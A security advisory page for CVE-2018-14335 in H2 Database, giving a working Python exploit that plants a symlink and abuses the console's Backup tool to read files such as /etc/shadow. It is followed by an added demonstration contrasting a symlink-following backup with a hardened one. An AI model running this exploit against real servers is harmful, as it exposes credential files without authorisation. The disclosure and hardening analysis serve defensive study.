H2 Database 1.4.197 Information Disclosure

2018.07.30
Credit: owodelta
Risk: Low
Local: No
Remote: Yes
CWE: CWE-275


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
# PS, thanks to HTB and our team FallenAngels

#!/usr/bin/python
import requests
import argparse
import os
import random


def cleanup(wdir):
    # Remove the planted symlink once the backup has been taken
    cmd = "rm {}symlink.trace.db".format(wdir)
    os.system(cmd)


def create_symlink(file, wdir):
    # Plant a symlink whose name ends in .db, so the Backup tool treats it as a
    # database file, pointing at the file we want the server to read for us
    cmd = "ln -s {0} {1}symlink.trace.db".format(file, wdir)
    os.system(cmd)


def trigger_symlink(host, wdir):
    outputName = str(random.randint(1000, 10000)) + ".zip"
    # get cookie: the console landing page redirects to login.jsp?jsessionid=...;
    # reuse that session id against tools.do
    url = 'http://{}'.format(host)
    r = requests.get(url)
    path = r.text.split('href = ')[1].split(';')[0].replace("'", "").replace('login.jsp', 'tools.do')
    url = '{}/{}'.format(url, path)
    # Run the Backup tool over wdir: every *.db entry in that directory, the
    # symlink included, is written into the zip (tools.do splits args on ",")
    payload = {
        "tool": "Backup",
        "args": "-file," + wdir + outputName + ",-dir," + wdir}
    #print url
    requests.post(url, data=payload).text
    print "File is zipped in: " + wdir + outputName


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('required arguments')
    required.add_argument("-H", "--host", metavar='127.0.0.1:8082', help="Target host", required=True)
    required.add_argument("-D", "--dir", metavar="/tmp/", default="/tmp/", help="Writable directory")
    required.add_argument("-F", "--file", metavar="/etc/shadow", default="/etc/shadow", help="Desired file to read")
    args = parser.parse_args()
    create_symlink(args.file, args.dir)
    trigger_symlink(args.host, args.dir)
    cleanup(args.dir)
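The script above relies on two things the reader should keep in mind: the attacker needs a directory on the H2 host that they can write to (to plant the symlink) and read from (to collect the zip), and the backup routine must follow the symlink when it opens a file whose name ends in .db. The following is an added example, not code from the advisory or from the H2 project: a small Python model of that backup behaviour, run over a constructed directory, next to a hardened variant that refuses symlinks and anything resolving outside the backup directory. The ".db" suffix filter, the file names, and the fake shadow line are assumptions made for the demonstration.

```python
"""Added example (not from the advisory or H2): symlink-following backup
versus a hardened one, exercised on a constructed temporary directory."""
import os
import tempfile
import zipfile
from pathlib import Path

# Assumption: the backup selects database files by suffix, the way the
# exploit's "symlink.trace.db" name is chosen to be picked up.
DB_SUFFIX = ".db"


def backup_following_symlinks(src_dir, zip_path):
    """Vulnerable model: zip every *.db entry in src_dir, symlinks included.

    zipfile.write() opens the link target, so a symlink named foo.db pulls
    whatever it points at into the archive. Returns the archived names."""
    names = []
    with zipfile.ZipFile(str(zip_path), "w") as zf:
        for name in sorted(os.listdir(src_dir)):
            if name.endswith(DB_SUFFIX):
                zf.write(os.path.join(src_dir, name), arcname=name)
                names.append(name)
    return names


def backup_hardened(src_dir, zip_path):
    """Hardened model: skip symlinks and any entry whose real path does not
    sit directly inside the resolved backup directory.

    Returns (archived names, skipped names)."""
    root = Path(src_dir).resolve()
    names, skipped = [], []
    with zipfile.ZipFile(str(zip_path), "w") as zf:
        for name in sorted(os.listdir(src_dir)):
            if not name.endswith(DB_SUFFIX):
                continue
            entry = Path(src_dir, name)
            # is_symlink() looks at the entry itself, before any resolution
            if entry.is_symlink() or entry.resolve().parent != root:
                skipped.append(name)
                continue
            zf.write(str(entry), arcname=name)
            names.append(name)
    return names, skipped


def read_from_zip(zip_path, name):
    """Return the text stored under `name` in the archive."""
    with zipfile.ZipFile(str(zip_path)) as zf:
        return zf.read(name).decode()


def demo():
    """Constructed scenario: a 'secret' file outside the working directory,
    one real database file, and a .db-named symlink to the secret."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp, "outside", "shadow")
        secret.parent.mkdir()
        # Constructed line; not a real password hash.
        secret.write_text("root:$6$fake$fakehash:17000:0:99999:7:::\n")

        work = Path(tmp, "work")
        work.mkdir()
        Path(work, "real.mv.db").write_text("h2 data")
        os.symlink(str(secret), str(work / "symlink.trace.db"))

        vuln_zip = Path(tmp, "vuln.zip")
        hard_zip = Path(tmp, "hard.zip")

        vuln_names = backup_following_symlinks(str(work), vuln_zip)
        leaked = read_from_zip(vuln_zip, "symlink.trace.db")
        hard_names, skipped = backup_hardened(str(work), hard_zip)

        return {
            "vuln_names": vuln_names,   # both entries archived
            "leaked": leaked,           # the secret's content, via the symlink
            "hard_names": hard_names,   # only the real database file
            "skipped": skipped,         # the symlink, refused
        }


if __name__ == "__main__":
    result = demo()
    print("vulnerable backup archived:", result["vuln_names"])
    print("leaked through symlink:", result["leaked"].strip())
    print("hardened backup archived:", result["hard_names"], "skipped:", result["skipped"])
```

The hardened check is deliberately two-fold: `is_symlink()` rejects the planted link itself, and comparing the resolved parent with the resolved backup directory catches the same trick pulled through a linked subdirectory. In a real fix the check belongs inside the backup tool, since the console user controls both `-dir` and the contents of that directory.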

Copyright 2018, cxsecurity.com